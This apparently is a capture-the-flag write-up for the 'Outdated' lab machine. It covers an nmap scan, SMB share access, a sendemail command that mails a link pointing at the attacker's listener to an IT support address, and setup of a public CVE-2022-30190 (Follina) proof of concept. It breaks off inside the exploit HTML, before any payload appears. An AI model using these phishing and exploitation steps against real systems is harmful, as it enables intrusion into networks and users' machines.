13 minutes
Outdated Write-Up
Initial Recon
Nmap
Starting with a full tcp port scan using nmap, I got the below results:
$ nmap -vvv -p- -A -oN nmap/tcp-all.txt -Pn 10.10.11.175
Nmap scan report for 10.10.11.175
Host is up, received user-set (0.077s latency).
Scanned at 2022-09-26 14:09:09 EEST for 731s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-09-26 18:19:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp open unknown syn-ack
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc syn-ack Microsoft Windows RPC
49930/tcp open msrpc syn-ack Microsoft Windows RPC
60156/tcp open msrpc syn-ack Microsoft Windows RPC
63257/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-09-26T18:20:36
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38272/tcp): CLEAN (Timeout)
| Check 2 (port 42327/tcp): CLEAN (Timeout)
| Check 3 (port 4812/udp): CLEAN (Timeout)
| Check 4 (port 48887/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 26 14:21:20 2022 -- 1 IP address (1 host up) scanned in 731.38 seconds
The default windows ports are open including 53 (DNS), 88 (Kerberos), 135 (MSRPC), 139 (NetBios), 445 (SMB) and 389 (LDAP) disclosing domain information: outdated.htb and DC.outdated.htb . There is also port 25 open, running a mail service and disclosing the mail domain: mail.outdated.htb.
I’ll add these domains to my /etc/hosts file:
echo -e '10.10.11.175\toutdated.htb , dc.outdated.htb , mail.outdated.htb' | sudo tee -a /etc/hosts
$ cat /etc/hosts | grep outdated
10.10.11.175 outdated.htb , dc.outdated.htb , mail.outdated.htb
Accessing Shares
First I’ll try to list available shares using:
smbclient -L 10.10.11.175 --no-pass
I can see some interesting shares, so I’ll take a look at some of them:
smbclient \\\\10.10.11.175/shares
Reading Important PDF
After accessing Shares share, I saw a NOC_Reminder.pdf file, and this is what it contains:
Sending Link To Victim
It appears that they had a breach, and they made a security assessment for their network and found the following CVEs. They also listed a mail itsupport@outdated.htb for support staff that will get emails containing links for internal applications to get them added to the assessment process.
Since port 25 (Mail Server) is open, I’ll try to send a link to
itsupport@outdated.htb after listening with netcat on port 80 on my machine and see if I get a hit back:
sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/" -s 10.10.11.175:25 -vvv
Identifying What Exploit Could Work
It worked. And it looks like what’s used to access the url is windows powershell which discloses the version WindowsPowerShell/5.1.19041.906, where the last part 19041.906 is the build number of windows operating system.
Googling this version shows that it was released on March 29 2021:
After learning more about the CVEs listed in the pdf, how they work and what date they were published (to see if the current build is vulnerable), some of them appeared to be exploitable by sending a link to the victim and having him clicking on it. And the one that stood out to me is CVE-2022-30190 (Follina), which only requires an application used by the victim (such as the current case) to access a malicious html file and remote code execution will be triggered.
Exploiting CVE-2022-30190
There are many POCs available online, the one I’ll use is CVE-2022-30190 POC:
git clone https://github.com/onecloudemoji/CVE-2022-30190.git
The repo includes a .docx file that should be send to the victim and he must click it to triger the exploit, and this is because Microsoft Word uses a calling application that was vulnerable, however in my case, I don’t need any .docx file, since the victim is already using an application (powershell) to access my server, so all I need to do is to modify the exploit payload to run my malicious command and get a reverse shell.
exploit.html looks like this:
<!doctype html>
<html lang="en">
<head>
<title>
Exploit
</title>
</head>
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
